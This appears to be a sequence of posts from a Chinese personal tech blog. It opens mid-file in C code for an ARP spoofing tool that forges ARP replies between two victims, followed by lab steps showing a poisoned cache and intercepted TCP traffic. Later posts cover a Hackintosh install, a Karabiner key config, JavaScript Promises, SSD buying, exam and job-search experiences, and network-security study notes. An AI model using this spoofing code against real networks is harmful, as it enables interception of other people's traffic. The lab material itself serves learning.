*/printf("please input self_mac address like aa-aa-aa-aa-aa-aa: ");scanf_s("%x-%x-%x-%x-%x-%x", &self_mac[0], &self_mac[1], &self_mac[2], &self_mac[3], &self_mac[4], &self_mac[5]);printf("please input victim1's ip like 1.1.1.1: ");//scanf_s("%d.%d.%d.%d", &victim1_ip[0], &victim1_ip[1], &victim1_ip[2], &victim1_ip[3]);scanf_s("%s", victim1_ip,15);printf("please input victim1's mac like aa-aa-aa-aa-aa-aa: ");scanf_s("%x-%x-%x-%x-%x-%x", &victim1_mac[0], &victim1_mac[1], &victim1_mac[2], &victim1_mac[3], &victim1_mac[4], &victim1_mac[5]);printf("please input victim2's ip like 1.1.1.1: ");//scanf_s("%d.%d.%d.%d", &victim2_ip[0], &victim2_ip[1], &victim2_ip[2], &victim2_ip[3]);scanf_s("%s", victim2_ip,15);printf("please input victim2's mac like aa-aa-aa-aa-aa-aa: ");scanf_s("%x-%x-%x-%x-%x-%x", &victim2_mac[0], &victim2_mac[1], &victim2_mac[2], &victim2_mac[3], &victim2_mac[4], &victim2_mac[5]);//pktbuild(&packet1, self_mac, victim1_ip, victim2_mac, victim2_ip);//build a arp-packet at &packet//pktbuild(&packet2, self_mac, victim2_ip, victim1_mac, victim1_ip);//build a arp-packet at &packetpktbuild2(&packet1, self_mac, victim1_ip, victim2_mac, victim2_ip);//build a arp-packet at &packetpktbuild2(&packet2, self_mac, victim2_ip, victim1_mac, victim1_ip);//build a arp-packet at &packet}/*选中特定的适配器*/int selectAdapter(pcap_if_t* targetAdapter) {pcap_if_t* alldevs;//网卡列表pcap_if_t* d;//选中的网卡int i = 0;/*获取设备列表并选定目标设备*/printf("the arp-attacker starts...\n");/* 检索设备列表 */if (pcap_findalldevs(&alldevs, errbuf) == -1){fprintf(stderr, "Error in pcap_findalldevs: %s\n", errbuf);exit(1);}printf("请在以下网卡中选择一个使用:\n");/* 打印网卡列表 */for (d = alldevs; d; d = d->next) {printf("%d. %s", ++i, d->name);if (d->description) printf(" (%s)\n", d->description);else printf(" (No description available)\n");}if (i == 0){  //没有扫描到网卡printf("\nNo interfaces found! Make sure WinPcap is installed.\n");return -1;}int targetAdapterIndex = 0;printf("Enter the interface number (1-%d) to use: ", i);scanf_s("%d", &targetAdapterIndex);/* 检查用户输入是否有效 */if (targetAdapterIndex < 1 || targetAdapterIndex > i) {printf("\nAdapter number out of range.\n");/* 释放所有网卡 */pcap_freealldevs(alldevs);return -1;}/* 跳到用户选中的网卡 */for (d = alldevs, i = 0; i < targetAdapterIndex - 1; d = d->next, i++);*targetAdapter = *d;}

2. 在攻击方运行该程序，输入两个受害者的ip地址和mac地址，进行攻击

3. 使用wireshark进行抓包，观察此程序每隔0.5秒就发送两个ARP报文。

• 192.168.44.128向192.168.44.129发送ARP报文，告诉它 192.168.44.130对应的MAC地址是 00-0C-29-83-C9-7C
• 192.168.44.128向192.168.44.130主机发送ARP报文，告诉它 192.168.44.129对应的MAC地址是 00-0C-29-83-C9-7C

4. 在受害者主机192.168.44.129上查看其ARP缓存表，看到``192.168.44.128的MAC已经被修改为 00-0C-29-83-C9-7C`，攻击成功。

5. 可以看到在监听过程中，攻击方可以监听两者互相发送的TCP报文，由此，证明攻击生效。

最近闲来无事想在家，花了点时间为自己的笔记本捣鼓捣鼓装了一套黑苹果系统，下面是这个旅程的点滴。

硬件环境

• 电脑 Huawei Matebook14 2019 i5-8265U MX250独显
• BIOS 1.26

需要的工具：

• WinPE 盘（WinPE盘制作）
• 16G以上的U盘
• 苹果镜像（可以搜索黑果小兵的部落阁下载）

安装过程

前置操作

如果有装WIN系统经验，需要一个部署盘来来进行安装。安装黑苹果也同样如此，首先需要刻录下载好的苹果镜像到U盘中，使用工具balenaetcher来进行刻录，操作很简单，看官网文档即可。

通常要求U盘大小不小于16GB

磁盘分区

由于目标是双系统安装，在不格式化windows分区的前提下，需要为mac建立新的专属分区。因此需要使用DiskGenius等工具来进行分区。

• 启动WinPE，打开DG软件或者傲梅助手，对磁盘进行调整，调整ESP分区大小为200M，并在安装磁盘末尾新建一个大约120G的HFS+分区

如果无法直接调整ESP分区大小，可以先调整C盘，在其前部加入100M，再扩容ESP分区为200M

就此，待安装磁盘的分区工作完成。

解锁CFG并修改dvmt至64mb

此部分不是必须的，但是特定的版本系统或者EFI需要执行此逻辑，否则会出现卡logo现象。

通过解锁cfg后能得到原生的电源管理、CPU变频、睡眠等特性。修改dvmt至64mb可以hdmi/dp输出4k60p的信号。此部分需要修改底层BIOS程序，具体操作很简单，可以参照 https://github.com/ske1996/matebook-13and14-OpenCore-Hackintosh 部分进行修改。注意事前备份BIOS

替换EFI分区

这一步是最重要的一步，EFI分区是系统启动的重要分区，通常位于磁盘的起始扇区，包含Bootloader、驱动等内容。因此需要找到与自己机器适配的EFI分区（也可以自己通过OpenCore来制作，后面会专门讲解）。

可以通过谷歌搜索“黑苹果+你的电脑型号” 来寻找别人做好的EFI分区

在找到适配的EFI文件之后，进入WinPE或者Windows系统，挂载U盘的OC分区，将该适配EFI文件夹 替换掉U盘OC分区下的EFI文件夹。

安装

1. 重启电脑，进入BIOS选择U盘启动，此时进入引导程序（Opencore、 Clover），再选择 Install MAC 选项进行安装。

在安装过程中，会重启很2-3次，如果不慎重启到windows启动，不要慌张，重新进入BIOS选择U盘启动，继续安装。

2. 安装完成后，进入MAC系统，挂载U盘EFI分区，将EFI文件夹下的OC文件夹复制到安装磁盘的EFI分区下，这一步是为了新建新的UEFI启动项目。

3. 启动到Win系统，使用Bootice工具修改UEFI启动序列，添加ESP分区下的 \OC\OpenCore.efi， 这样一来，就可以通过F12进入启动菜单，选择不同的启动项来引导windows或者mac系统。

后续操作

1. 根据 https://github.com/ske1996/matebook-13and14-OpenCore-Hackintosh 安装HDIPI部分进行安装，这一步为了选择适合自己屏幕的分辨率，防止过大或者过小影响使用。
2. 测试各个功能项是否可用，如果不可用一般是驱动问题，可以自行谷歌，如果使用Opencore来引导，通常是编辑 \EFI\config.plist 文件来进行修复。此文件定义着BIOS引导MAC过程中的各项配置，例如驱动位置、机器码、补丁等等。可视化编辑软件：OC Auxiliary Tools , 我们也是根据此软件来定做自己的EFI分区
3. 修改三码，首先利用Hackintool工具来生成三码，然后使用OC Auxiliary Tools来进行修改。此部分比较玄学。

成果截图

下面贴几张成果图，虽然不是第一次体验MacOS，但是对于我来说，对比Win其明显的特点包括：

• win是用户改造产品，mac真是产品改造用户…
• apple的审美还是不错的
• 简约，虽然隐藏了许多系统级别的自定义，但是确实提供了非常直观的接口给用户，学习成本低
  
  
  

总结

其实安装黑苹果和安装windows类似，但是如何寻找并配置驱动并进行相应的复杂配置是一个难点。通常此次DIY，也对EFI分区和win、macos的启动流程有新的认识。希望在接下来的体验过程中，能对MacOS有进一步的了解。

其他优化

快捷键设置

刚开始使用MacOS时，对其快捷键感觉强烈不适应，本着尽量远离鼠标是提高生产效率的重要原则，第一时间就去寻找替换快捷键的方案，直到遇到 Karabiner 热键工具。
推荐的几个rules:

• CapsLock Toolbox (类似windows capslock+ 的功能， 例如 capslock + s = 光标右移)
• Windows shortcuts on MacOS (实现ctrl+C, crtl+A 等重要功能)

配置方法如下图所示：

{    "description": "CAPSLOCK + hjkl to arrow keys (Post CAPSLOCK if press CAPSLOCK alone)",    "manipulators": [        {            "conditions": [                {                    "name": "caps_lock pressed",                    "type": "variable_if",                    "value": 1                }            ],            "from": {                "key_code": "d",                "modifiers": { "optional": ["any"] }            },            "to": [{ "key_code": "down_arrow" }],            "type": "basic"        },        {            "conditions": [                {                    "name": "caps_lock pressed",                    "type": "variable_if",                    "value": 1                }            ],            "from": {                "key_code": "e",                "modifiers": { "optional": ["any"] }            },            "to": [{ "key_code": "up_arrow" }],            "type": "basic"        },        {            "conditions": [                {                    "name": "caps_lock pressed",                    "type": "variable_if",                    "value": 1                }            ],            "from": {                "key_code": "s",                "modifiers": { "optional": ["any"] }            },            "to": [{ "key_code": "left_arrow" }],            "type": "basic"        },        {            "conditions": [                {                    "name": "caps_lock pressed",                    "type": "variable_if",                    "value": 1                }            ],            "from": {                "key_code": "f",                "modifiers": { "optional": ["any"] }            },            "to": [{ "key_code": "right_arrow" }],            "type": "basic"        },        {            "from": {                "key_code": "caps_lock",                "modifiers": { "optional": ["any"] }            },            "to": [                {                    "set_variable": {                        "name": "caps_lock pressed",                        "value": 1                    }                }            ],            "to_after_key_up": [                {                    "set_variable": {                        "name": "caps_lock pressed",                        "value": 0                    }                }            ],            "to_if_alone": [{ "key_code": "caps_lock" }],            "type": "basic"        }    ]}

其他软件

• maccy 剪切板软件
• AltTab 窗口切换软件
• Alfred 4 快捷工具
• KeePassXC 密码管理工具

其他参考

• MateBook14 黑苹果双系统教程
• 安装完成后解决蓝牙无法正常启用的问题

最近我一直在学习事件驱动模型和Ajax等组件。在这些组件中，经常会遇到异步操作。虽然在后端开发中，异步操作很常见，但是我作为前端新手，在学习前端时经常使用Ajax进行异步请求，而被其回调处理折磨得死去活来。幸好我遇到了Promise。

Promise 是一种处理异步操作的方式，它可以更好地管理异步结果，并支持链式调用，从而避免了多层嵌套的回调。

Promise对象概念

The Promise object represents the eventual completion (or failure) of an asynchronous operation and its resulting value.

Promise对象代表一个异步操作的最终结果以及其结果值，由于这个未来值还不确定，因此为其定义三个状态：

• fulfilled 意味着这个操作成功
• rejected 意味着这个操作失败
• pending 初始状态， 既不是 fulfilled 也不是 rejected 的状态。

Promise的构造函数

new Promise(executor) //上述代码等价于下面代码new Promise((resolveFunc, rejectFunc)=>{resloveFunc(value) //call on resolved, 同时会将状态转换为 fulfilledrejectFunc(reason) // call on rejected 同时会将状态转换为 rejected})

executor: 是一个 function。它接收两个函数作为参数：resolveFunc 和 rejectFunc。在 executor 中抛出的任何错误都会导致 Promise 被拒绝，并且返回值将被忽略。

使用案例

假设我们有三个异步操作，它们有先后顺序，前面的异步请求成功并返回响应之后才能调用下一个异步操作。下面将从传统方法和使用Promise来实现来处理这个逻辑。

在传统方法中，我们经常会在异步函数中参数中设置回调函数（ Callback Function ），轻而易举写出了以下代码，多个异步操作需要依次执行，并且其中一个异步操作的结果会影响下一个异步操作时，就会导致回调函数嵌套的情况。

// eg.1doSomethingAsync(function(result1) {    doSomethingElseAsync(result1, function(result2) {        doAnotherAsync(result2, function(result3) {            // 更多嵌套的异步操作            // ...        });    });});

在上面的例子中，doSomethingAsync 函数返回一个异步结果，并在回调函数中处理该结果。然后， doSomethingElseAsync 函数依赖于第一个异步结果，并在嵌套的回调函数中处理第二个异步结果。这种嵌套的回调结构会导致代码的层次结构变得复杂，很难阅读和维护，从而形成回调地狱。如果以上问题使用Promise来解决，就变成了：

// eg.2function doSomethingAsync() {    return new Promise((resolve, reject) => {        // 异步操作，例如网络请求、定时器等        // ...        // 异步操作完成后，调用 resolve 或 reject        resolve(result);        // 或        reject(error);    });}function doSomethingElseAsync(data) {    return new Promise((resolve, reject) => {        // 异步操作，例如网络请求、定时器等        // ...        // 异步操作完成后，调用 resolve 或 reject        resolve(result2);        // 或        reject(error2);    });}//Promise链式调用doSomethingAsync()    .then(result1 => {        return doSomethingElseAsync(result1);    })    .then(result2 => {        return doAnotherAsync(result2);    })    .then(result3 => {        // 处理最终的结果    })    .catch(error => {        // 处理错误    });

在上述代码中，我们在 doSomethingAsync 中使用了Promise的链式调用，通过 .then() 来依次处理异步操作的结果，如果其中任何一个操作发生错误，可以使用 .catch() 来进行捕获和处理。后来，JS又加入了 async/await 语法，以便更舒适的使用 promise。

// eg.3async function handleAsyncOperations() {    try {        const result1 = await doSomethingAsync();        const result2 = await doSomethingElseAsync(result1);        const result3 = await doAnotherAsync(result2);        // 处理最终的结果    } catch (error) {        // 处理错误    }return result3;}handleAsyncOperations();

对于上述代码，有几点需要说明：

• 被async修饰的函数必须返回一个promise，如果返回的非promise类型，则会自动包装成一个promise类型

  async function foo() {  return 1;}//It is similar to:function foo() {  return Promise.resolve(1);}

• The await operator is used to wait for a [Promise](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Promise) and get its fulfillment value. It can only be used inside an async function or at the top level of a module.

• await/async 可以帮助我们简化代码，无需太多的 then() 语句

关于promise的更多内容，例如其原型方法then、finally、catch以及常用方法resolve等可以查看MDN官网。

参考资料

1. MDN-async function
2. MDN-Promise
3. Promise练习题

目录

SSD（Solid-state drive）

主要品牌：三星、西部数据、爱国者、致态、凯侠

购买固态时，应该从固态颗粒、主控固件、有无独缓、接口等方面来筛选。实际使用时，也应掌握工具使用来测量其实际工作的性能。下面将从颗粒、独缓、接口协议以及工具使用几个话题来聊聊日常固态的选购指南。

闪存颗粒

闪存颗粒是存储实际数据的半导体器件，是固态最重要的元件。全球生产固态颗粒的厂商有三星、海力士、东芝（铠侠）、闪迪（西数）、英特尔、美光（英睿达）以及长江存储（致钛）等几家。

如果你想支持国产的话，一定不要忘记国货之光—致钛

闪存颗粒主要根据其存储信息数量的多少进行分类，比较常见的有以下几种：

• SLC (single-level cell) 每个Cell存储1bit信息，结构简单，各项性能优秀但是价格高
• MLC (multi-level cell) 每个Cell存储2bit信息，价格稍贵，性能对于SLC稍欠佳。
• TLC (triple-level cell) 每个Cell存储3bit信息，成本和性能折中的方案，也是现在主流产品
• QLC (quad-level cell) 每个Cell存储4bit信息，写入速度较慢，价格较便宜。

固态颗粒按照数据稳定性、速度以及价格排序为SLC>MLC>TLC>QLC。日常购买使用其实不必太多纠结，现在家用级别固态主要是TLC颗粒，当然如果你很壕，可以入手一块SLC固态作为系统盘使用。但是对于一般场景，其体验差距不大（别忘了还有内存这个老大哥呢！）

独立缓存

视频可看硬件茶谈，将固态硬盘看作是计算机系统，固态主控比作是CPU，NAND颗粒比作是“磁盘”，而固态缓存就是内存。当写入数据时，先写入缓存，然后再写入NAND。

关于固态缓存，可以分为DRAM缓存和SLC缓存。

1. DRAM缓存 使用DRAM器件作为外置缓存，特点是价格较贵成本高，但是速度较快。
2. SLC缓存 TLC有三电子态，而SLC是一电子态，因此SLC读写速度比TLC快，可用TLC颗粒模拟SLC做缓存。缺点是会造成写放大，导致缓存区域颗粒损耗加快3倍。也可以使用MLC、QLC模拟成SLC颗粒来提升读取速度。优点是成本低，是目前中低端固态所采用的方案。

当采用模拟SLC方案来实现缓存时，会分配一定容量作为缓存区。当写入数据时，会先写入SLC缓冲区，然后再由后台去缓慢写入TLC，并释放SLC所占用的空间。

而当写速度过大时，SLC缓冲区被写满，此时SSD性能就会下降至直接写TLC水平，这就产生了缓外掉速的说法。

因此，一般推荐使用带缓存的大品牌固态硬盘作为系统盘。而游戏盘可以选用中低端、容量大的无缓盘。

接口分类

购买固态硬盘时，通常商品详情页会看到许多参数，比如PCIe、Nvme、M.2、SATA等字眼。这些参数主要是和固态接口相关的术语。此节将对固态的常用接口做简要说明。对于不同接口，其中区别主要体现在外观尺寸、支持通道以及支持协议，这些都是选购固态硬盘的最重要的参数，这些参数也经常会出现主板支持参数上。

这些参数通常让人眼花缭乱，下面一张图来解释各个参数所代表的含义：

上图中，物理接口就是规定接口的形状大小、总线就是主板上支持的物理传输通道类型、接口协议规定SSD使用物理数据通道的规则。

SSD的物理接口主要分为：SATA 3、M.2、PCIe、U.2。此部分下面会逐一说明。

SSD的总线类型主要分为：SATA （绝大部分主板都支持）、PCIe3.0/4.0（需要特定主板支持）。我们也称之为总线类型、数据通道类型等。SATA总线理论速度600MB/s、以PCIe 3.0×4总线为例，它的带宽高达32Gbp。因此

SSD的协议类型主要规定数据该怎么走，是串行还是并行等等。主流协议分为：

• Nvme ： 通常是SSD接入PCIe数据通道所使用的软硬件标准，特点主要是使用PCIe总线和数据传输并行性。（流行的m.2接口都是采用此协议）。
• AHCI ： 速度较慢，通常是SSD接入SATA通道所使用的协议。

SATA3.0接口

下图是SATA接口的基本外观，其中金手指包括两部分，左边的短的插槽是数据引脚，右边长插槽是电源引脚。其中数据线通常是购买主板时附带的，电源线通常是购买电源时附带的。所以一般来直接购买的单块固态硬盘是只有硬盘主体的。

SATA是目前最常用的固态硬盘接口，通常主板上会有多个SATA接口，理论最高数据传输速度是6Gbit/s，实际最速度约为$600MB/s$ 具体各个协议见下图。由于SATA固态硬盘的数据传输接口没有供电引脚，所以需要独立供电。一般来说SATA接口的固态硬盘价格比较低。下表显示了不同接口的最高传输速率以及其他指标。

M.2

M.2是目前最主流的接口。主要优点在于体积小巧，性能出色，在笔记本电脑和台式机上经常用到。也是推荐购买的一类固态。

M.2接口类型分为两种： 支持SATA通道的与Nvme通道的。其中前者的速度只有$6Gbps$带宽，与普通的SATA固态硬盘差别不大，只是外观尺寸不一样。下面两张图是分别支持PCIe通道和SATA通道的固态硬盘：

​

除了通道不一样之外，其长度也有不同，分别由2242、2260、2280三种，一般来说PCB越长那么颗粒越多，容量就越大。

U.2接口

作为一款比较先进的接口， 最高传输速率是$32Gbps$，是目前固态硬盘传输速率最快的。虽然它与SATA接口很像，但是它采用Nvme协议并且走PCIe通道，所以速率都是远超一般SATA接口固态的。缺点是这块接口的固态现在还不常见，并且一般主板都没有配备U.2接口，需要用到转接卡来接入主板。

PCIe接口

PCIe凭借着其天然的接口优势可以直接接入PCIe通道，PCIe3.0 x 4通道速度高达$32Gbps$，带来了极高传输速度。但是该接口的固态硬盘主要用于企业级市场，消费级市场没有多少需求。其价格通常是5000元以上。但是相信在不久的将来，此类硬盘可以下放到中高端消费市场。

性能测试

性能测试主要是测试固态的实际读写速度，温控以及其他指标。主流测试软件包括AS SSD Benchmark和Crystal DiskMark。在ldtools都提供了下载链接。下面通过测试结果来对参数和指标来进行说明。

• 读写方式： 分为顺序（sequences）和随机（random）两种方式。分别反应读取连续大文件和分散小文件时的场景。
• 数据大小：单次读取读/写的大小。其中$$总读写次数=\frac{测试总量} {单次大小}$$
• 队列深度：OS先将不同随机读/写 请求加入缓冲请求队列，进行异步的落盘操作。当队列深度为1时，就是单次随机读（每发送一次IO请求，就进行落盘一次）。此参数的具体参考了关于队列深度的解释
• 线程数：模拟多个线程同时进行IO请求操作。

另外，如果想了解关于固态的其他指标和信息，可以使用CrystalDiskInfo工具来进行查看，例如笔者的一块垃圾固态信息：

注意大家所说的 0E 错误就是上图中 ID为0E的计数项值，通常来说此项的原始值为0

因此，由于固态硬盘的连续读写速度都比较高，**真正首要评判SSD性能的参数是4K随机读的速度，然后是4K随机写和连续写的速度，其中4K随机读的成绩基本决定了SSD的性能高下。**当然最贴切实际的测试，还是加载PS等一些大型游戏和软件的时长，这部分可以参考产品的具体测评。

热门产品

• 海力士 P44 pro
• 三星 980、970 系列
• 致钛 5000、 7000系列
• 西部数据 SN570等

总结

总结以下我们学习了那些术语：

• 闪存颗粒 tlc、qlc、mlc、slc
• 独立缓存，DRAM缓存、模拟SLC缓存
• 协议接口
  • 接口类型 M.2、U.2、SATA、PCIe
  • 总线类型 PCIe（3.0、4.0）、SATA
  • 协议类型 AHCI、Nvme
• 性能测试
  • 随机读写 该指标表示存放在不同在地方的小文件的性能
  • 连续读写 该指标表示读取连续大文件的性能

同时，也提到了跑分的参数解析、0E错误查看等内容，希望此篇文章大家对固态有了一定的基础了解。

参考资料

• 一篇文章告诉你SLC、MLC、TLC和QLC究竟有啥区别?
• Solid-state drive wikipedia
• 磁盘io介绍
• 固态接口
• 超能网

时间线

  终于从忙碌的日子中缓过来，有时间坐下来写一篇博客了，首先回顾一下最近一年的重要节点吧：

• 2022.2-2022.4 参加23届暑期实习，投了京东、美团、阿里，成功进面，但是最终都失利；
• 2022.4.14 由于前期春招提前批找实习失利，此时决定开始考研；
• 2022.07，大三暑假租房在南京马群租房备考，马群真的是一个神奇的地方。
• 2022.12.23 由于疫情放开，考前几天开始有点不舒服；
• 2022.12.25 坚持考完，最后一科408结束，复盘后自我感觉考的非常烂…
• 2023.02 忐忑的过完了春节，担心无法上岸，开始两手准备春招补录。策略：从面中小厂锻炼经验，后前逐渐转向大厂；
• 2023.03底 前前后后总共面了30+场，陆陆续续拿到了京东、知乎等大厂以及几家中小厂offer；（面了10多家，只有两家面挂，其他均offer）
• 2023.3.24 分数线发布，由于大家考的都不是怎么好，所以今年分数线降低了，压着分数线苟进复试。
• 2023.4.1 前往北京参加线下复试，共20分钟，中间一两题不会，但是总体自我感觉良好
• 2022.4.4 复试结果出炉，复试成绩意外进了前十，总位次前进30+，成功逆袭，拟录取；

总觉得，这一年过的确实很累很累，从大三找暑期实习失利到准备考研，从考研失利到准备找工作，幸运的是，在就业和升学两条路上，都有了好的结果。最后找到了比较满意的大厂offer，也考研成功上岸。 所以谨以此篇来分享这一路的感想和一些包括求职和考研路上的一点见解。（附几个上岸截图攒攒人气：

2023.7.17更新：收到录取通知书拉

考研篇

  　  我觉得考研路上能走到终点中最难得的无非有二：

• 坚持，因为备考过程中间有很多节点，例如保研开奖九月，金九银十秋招等节点，我的建议可以多试试，但是重心应该还是在自己的目标上；少接触点负面情绪；
• 踏实，公共课、专业课，一点不能马虎，不能漏过每一个知识点，根据自己的目标制定计划，稳步前进就好了。

同时，也有小部分运气使然。比如报考院校的热门程度以及当年考试的天时地利人和等等。但是我坚信坚持走下来，一般运气不会太差。

关于专业课复习，可以看看我的研友写的东南高分佬上岸经历：https://lmzyoyo.top/archives/kao-yan-chu-shi

在此也非常庆幸考研路上的几位研友，复习累的时候能吹吹牛侃侃大山缓解一下紧张情绪。

北邮计算机相关专业的初试经验

  北邮计算机方向和网安方向的笔试科目是 11408，号称计算机考研天花板的科目；

• 关于高数（I），由于本人是个菜鸡，所以不再分享，可以看看上述的研友上岸经验分享；
• 关于英语（I），一定一定一定多背单词，考前半个月准备一下自己的作文模板默，一天默写个一次，然后多多刷阅读就好了了；注意：北京地区比较压分，所以尽量提高选择题得分；；
• 关于政治，前期微信搜个苍盾考研小程序狂刷选择题，后期多多背背肖秀荣8+4足矣；注意：北京地区比较压分，所以尽量提高选择题得分；
• 关于408，
  1. 由于自己有一点数据结构的基础，所以复习的顺序是 计组、计网、操作系统、数据结构；难度：计组>>数据结构 > 操作系统 = 计网。 时间分配也是按照如此。
  2. 总体规划：前期多刷几遍王道考研408考研辅导资料，后期11-12月份多刷几遍真题。其他的真没必要额外准备。（可能非科班跨考同学的也要注意一下数据结构的基本coding）。
  3. 其中最为重要的是：一定按照考纲，不能遗漏每个知识点！！！ 因为有些冷门知识点被出成大题，这些题目你会了就10分，不会一分没有，例如23年刚刚考过的的DS的最佳归并段。血的教训！！！。
  4. 后期以回顾为主，建议参考王道思维导图来进行快速回忆冷门知识点。

北邮计算机相关专业的复试经验

• 注意基本Coding，北邮一般欢迎具有一定Coding技能的同学（高分大佬除外）。
• 要格外注重复试，提前复习相关内容，北邮复试占比总入学成绩 50%, 完全可以被逆袭当然也可以逆袭别人！（北邮计科23年刷了好几个高分 380+，本人也是初试边缘人物，通过复试前进30+名）；
• 好好准备自己的简历，不要给自己挖坑。
• 对于常见问题应该准备好，尽量不要临场发挥。
• 对于报考网安专业，一定要看密码学 和 网络安全，复试被提问的概率极大！
• 其他一些：好好准备一份简历，好好准备基本英语口语，可以提前联系一下导师。
• 有精力去参加一些企业面试找找经验，亲测有用。（如果面试都拿到大厂offer了，区区考研复试还有什么担心的？）
• 面试大概15分钟，包括基本沟通、专业知识以及项目等环节。

求职篇

• 十字真言：早点准备，早点投，早点面！！！ 不要觉得你没有准备好而不敢投，一个萝卜一个坑，坑位没了你再强也没用。在面试中学习。 如果想珍惜大厂面试机会，建议前期多投几个小厂练练手！
• 好好准备一份简历，你面试能力再强，入不了HR的法眼，初筛都过不了也没有用呀！！！建议使用超级简历来制作简历。八股可以走捷径，但是简历可不行。
• 注重算法，如果你是大一大二，那么请多多参加一些企业或者老师的项目，还有就是竞赛，这里我推荐多刷刷算法题，打打相关竞赛例如：xcpc、cf、leetcode、newcode… 只要与算法相关的都可以刷一刷，如果时间紧迫：Leetcode刷熟练就可以了。（这也是企业笔试中的硬性要求）
• 夯实基础，例如投递岗位要求的一些基本知识，面试过程中不要犯低级错误！建议是先追求广度，再追求深度。对于某些拓展知识例如分布式共识算法、加密算法、Git、Docker使用等等，不要钻到太深，但是基本概念要尽量知道。基本要求就是要和简历上的内容相呼应！
• 注重软技能：如何检索信息？（说百度你就挂了，真人真事）如何解决实际问题？如何改善自己项目达到某种要求（性能、存储等方面）？（某厂面试官原话：其实八股大家都会，就看你有没有较强的学习能力和对技术的热爱差程度）。
• 多多看一些技术博客，如果有机会，自己搭建一个技术博客，说不定哪篇文章能让面试官眼前一亮呢？我觉得这也是一个很大的加分项！（ 知乎等一些厂的研发岗位明确表示拥有博客加分）
• 如果知识点太多，可以使用一些平台例如ProcessOn来做一个自己的知识图谱，以便面试前的快速查缺补漏，例如我的Java方面的知识图谱：Tans的知识图谱
• 多去一些平台刷面经，我用的比较多的是牛客，对于校招生投递的时候尽量官网投递，而不是Boss直聘、脉脉那种渠道。

以后还会不定期更新此篇文章，还是那句话，皇天不负有心人，坚持就是胜利，其实考完研的那几天我觉得天都要塌了，就业也没工作，考研又考不上，幸好当时没有气馁，经过自己的努力，最后两者都有非常满意的结果！所以不怕你失败，就怕你失败后找不到接下来的目标，换赛道两手准备也好，继续坚持也好，不让自己闲着就是前进。 希望这篇帖子能给你带来帮助。祝好！

本篇文章探讨一下网络安全，主要从以下几个方面入手: 访问控制、防火墙、入侵检测、网络攻击。由于网络安全内容过于繁多，所以主要对其有一个初步的了解即可。

访问控制

系统使用一定的策略来对用户身份及其所属的预先定义的策略组限制其使用数据资源能力的手段。主要目的是控制主体对客体的访问。

访问控制主要包括： 主体， 客体， 控制策略

安全策略的实施原则：

• 最小特权原则，给主体最低限度的授权权力
• 最小泄露原则：给主体所需知道的信息的主体权力
• 多级安全策略：划分多个安全等级，对于某一客体，安全级别比其高的主体才能访问。

DAC

自助访问控制模型，允许合法用户按照策略访问客体，而阻止非授权用户的访问，同时某些用户可以自主的将自己所拥有的客体访问权限授予其他用户。

MAC

强制访问控制模型，系统事先给访问主体和受控对象分配不同的安全等级属性。

主体对客体的访问方式主要：向下读，向下写，向上读，向上写

几种控制模型：

• Lattice模型，适用于需要对信息资源进行明显分类的系统
• BLP模型，无下写，无上读，也就是说绝密级程序无法将绝密信息写到机密级程序中。强调信息的保密性能但是忽略了信息的完整性（上面的信息不能传到上面，下面的人也别读取上面的事情）
• Biba模型， 禁止向上写，没有向下读。（下面的东西不要传上去，上面的也别读下面的）

防火墙

防火墙控制方法：

• 服务控制
• 方向控制
• 用户控制
• 行为控制

防火墙的体系结构

• 双重宿主主机体系结构
• 屏蔽主机体系结构
• 屏蔽子网体系结构

入侵检测

入侵检测是一种主动保护自己的网络和系统免遭非法攻击的网络安全技术。主要功能包括： 监控分析用户和系统活动，发现入侵企图和异常现象，记录报警和响应，审计评估关键系统和数据文件的完整性等。

入侵检测技术

主要分为 异常检测技术 和 误用检测技术。

首先，异常检测技术的思想主要是凡事皆有规律，而入侵会引起用户或者系统行为的异常，有点事后诸葛亮的意思。将规律称作用户轮廓，主要包括：

• 统计分析，依靠特征变量的历史数据建立统计模型，运用该模型对特征变量未来的取值进行预测和隔离。缺点：难以确定门限值，入侵者可以训练该门限值。训练出来的模型可以是均值和标准差模型，多元模型，时间序列模型。
• 神经网络，利用神经网络通过一系列信息单元训练神经元，给定一定的输入时候，可以预测部分输出。

再者，误用检测技术的思想是通过某种方式预先定义入侵行为，然后监视系统，从中找出符合预先定义规则的行为，有点请君入瓮的意思。

• 专家系统 将入侵的知识转换为if-then结构的规则，将构成入侵所要求的条件转换为if部分，面临全面性问题和 效率问题
• 模型推理，结合已有的攻击脚本推理出入侵行为是否出现。当时不能解决复杂脚本
• 状态转换分析，将入侵行为看作是行动序列，这个序列导致系统从初始状态转入入侵状态，只需要提取从正常态转换为入侵态的关键条件，那么就可以将该条件集成到模型中来。因此不用查找审计记录。但是不善于分析过分复杂的事件，不能检测和系统状态无关的入侵。

此外还有其他的检测技术：

• 完整性分析，通过检测当前系统文件或者系统表，来检查是否发生或者即将发生入侵行为。不利于实时响应，但是检测效果比较好（只要系统文件发生改变）

网络攻击

攻击的类型：

• 阻断攻击
• 截取攻击
• 篡改攻击
• 伪造攻击

被动攻击包括 报文内容的泄露，通信分析。 主要被动的接收信息并且分析

主动攻击包括 伪装，回答，修改报文，拒绝服务，对数据流的某些修改或者截取数据流。

ARP攻击

ARP欺骗攻击：

1. 发送大量虚假MAC地址数据包，原理是地址映射表的大小也就有限，但是不适用于静态地址映射表的交换表
2. ARP欺骗，中间人攻击，向主机A和主机B分别发送ARP应答包，使他们各自的ARP缓存中目的IP地址都是C的MAC地址（本来应为 MAC-A和MAC-B）。
3. 修改本地MAC地址达到嗅探，只适用与动态生成地址映射表的交换机。

攻击溯源

1. 捕包分析，运行一台主机上运行抓包软件，如果某个IP不断发送ARP Request请求包，那么本IP可疑
2. 找一台不能上网的主机，运行arp -a命令，如果本主机有和其他主机的MAC地址，说明本地主机和这台主机最后有过数据通信。
3. 使用tracert ip 来查看访问路径，如果有中间有其他跳跃，那么就是中间人。

# arp -a接口: 10.161.152.9 --- 0xf  Internet 地址         物理地址              类型  10.161.255.254        70-c6-dd-09-b0-02     动态  10.161.255.255        ff-ff-ff-ff-ff-ff     静态  224.0.0.22            01-00-5e-00-00-16     静态  224.0.0.251           01-00-5e-00-00-fb     静态  224.0.0.252           01-00-5e-00-00-fc     静态  224.0.0.253           01-00-5e-00-00-fd     静态  239.255.255.250       01-00-5e-7f-ff-fa     静态  255.255.255.255       ff-ff-ff-ff-ff-ff     静态接口: 172.21.32.1 --- 0x3a  Internet 地址         物理地址              类型  172.21.47.255         ff-ff-ff-ff-ff-ff     静态  224.0.0.22            01-00-5e-00-00-16     静态  224.0.0.251           01-00-5e-00-00-fb     静态  224.0.0.252           